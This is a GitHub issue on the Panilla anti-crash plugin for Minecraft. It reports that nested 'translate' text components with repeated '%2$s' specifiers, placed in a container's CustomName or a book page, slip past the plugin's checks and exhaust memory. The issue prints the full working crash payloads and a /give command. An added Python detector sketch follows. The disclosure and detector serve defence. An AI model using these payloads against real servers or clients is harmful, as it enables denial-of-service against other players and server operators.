ds58 / Panilla

Prevent abusive NBT and crash packets on a Minecraft server
MIT License
149 stars 40 forks

Crash method with translations when opening containers (server crash) or books (client crash) #142

Open Zailer43 opened 6 months ago

Zailer43 commented 6 months ago

Details

The following NBT of a container can cause a java.lang.OutOfMemoryError: Java heap space. Therefore, this is prevented in the Name of the items on display, but it is not checked in the CustomName of the BlockEntityTag.

https://github.com/ds58/Panilla/blob/c384c90832977799dbdefa46fe9f72e4a91d0f30/api/src/main/java/com/ruinscraft/panilla/api/nbt/checks/NbtCheck_display.java#L35-L78

Edit: I was testing, and currently Panilla doesn't fix it in books either, only in the item name.

NBT

{BlockEntityTag: {CustomName: '[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\
\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["","overwritelox"]}]]}]]}]]}]]}]]}]]}]]}]]}]]}]]}]'}}
{BlockEntityTag: {CustomName: "[{\"translate\":\"%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s\",\"with\":[\"\",[{\"translate\":\"%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s\",\"with\":[\"\",[{\"translate\":\"%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s\",\"with\":[\"\",[{\"translate\":\"%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s\",\"with\":[\"\",[{\"translate\":\"%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s\",\"with\":[\"\",[{\"translate\":\"%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s\",\"with\":[\"\",[{\"translate\":\"%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s\",\"with\":[\"\",[{\"translate\":\"%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s\",\"with\":[\"\",[{\"translate\":\"%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s\",\"with\":[\"\",[{\"translate\":\"%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s\",\"with\":[\"\",[{\"translate\":\"%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s\",\"with\":[\"\",\"overwritelox\"]}]]}]]}]]}]]}]]}]]}]]}]]}]]}]]}]"}}

Edit: Book

/give @s minecraft:written_book{pages:['[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%
\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["","overwritelox"]}]]}]]}]]}]]}]]}]]}]]}]]}]]}]]}]'],title:"haha funny book", author:"Notch"}
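
One way to screen any text-component string (item name, `CustomName`, book page) for the expansion described in this report, added here as an example and not taken from Panilla: a Python sketch that measures how large a component would render without rendering it. The function names, the two caps and the `SAMPLE` value are assumptions, and the code assumes the `translate` key has no language entry and is therefore used as the format string.

```python
import json
import re

MAX_RENDERED = 32_767  # assumed cap on rendered characters; tune per server
MAX_DEPTH = 64         # assumed cap on component nesting
_SPEC = re.compile(r"%(?:(\d+)\$)?([%s])")  # matches %%, %s and %N$s
SAMPLE = '[{"t\\u0072anslate":"%2$s%2$s","with":["",[{"translate":"%2$s%2$s","with":["","ab"]}]]}]'  # constructed

def rendered_size(comp, depth=0):
    """Upper bound on the rendered length, computed without rendering."""
    if depth > MAX_DEPTH:
        raise ValueError("nesting too deep")
    if isinstance(comp, list):
        total = sum(rendered_size(c, depth + 1) for c in comp)
    elif isinstance(comp, dict):
        total = len(str(comp.get("text", "")))
        total += rendered_size(comp.get("extra", []), depth + 1)
        if "translate" in comp:
            total += _translate_size(comp, depth)
    else:
        total = len(str(comp))
    if total > MAX_RENDERED:
        raise ValueError(f"renders to at least {total} characters")
    return total

def _translate_size(comp, depth):
    fmt = str(comp["translate"])  # assumption: no lang entry, so the key is the format
    args = comp["with"] if isinstance(comp.get("with"), list) else []
    sizes = {}  # each argument is measured once, however often it is referenced
    total = pos = seq = 0
    for m in _SPEC.finditer(fmt):
        total += m.start() - pos  # literal text before this specifier
        pos = m.end()
        if m.group(2) == "%":
            total += 1            # %% renders as one character
            continue
        idx = int(m.group(1)) - 1 if m.group(1) else seq
        seq += 0 if m.group(1) else 1
        if 0 <= idx < len(args):
            if idx not in sizes:
                sizes[idx] = rendered_size(args[idx], depth + 1)
            total += sizes[idx]
    return total + len(fmt) - pos

def is_safe(raw_json):
    try:
        rendered_size(json.loads(raw_json))  # json.loads decodes \uXXXX in keys too
        return True
    except (ValueError, RecursionError):
        return False
```

Because each `with` argument is measured once and multiplied by its reference count, the check runs in time linear in the component's size even when the rendered text would be exponential, and parsing the JSON first means `\u`-escaped key names cannot slip past a plain string match.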